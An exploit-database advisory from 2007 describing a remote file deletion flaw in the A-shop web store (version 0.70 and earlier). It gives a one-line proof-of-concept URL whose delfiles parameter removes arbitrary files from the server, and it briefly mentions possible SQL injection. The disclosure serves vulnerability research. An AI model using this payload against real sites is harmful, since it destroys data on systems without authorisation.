id: 2036
date: 07/17/2007
title: A-shop <= 0.70 Remote File Deletion Vulnerability
author: Timq
cves: 

=================================================
A-shop <= 0.70 Remote File Deletion Vulnerability
=================================================



A-shop <=0.70 Multiple vulnerabilities

Found Bug: Timq


Vendor:http://www.rammdev.com/ashop/

PoC:
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]

It is possible to delete not only the files in the folders listed,
but also ouside its directory.
Also possible sql injections in other areas.


#  0day.today [2023-03-27]  #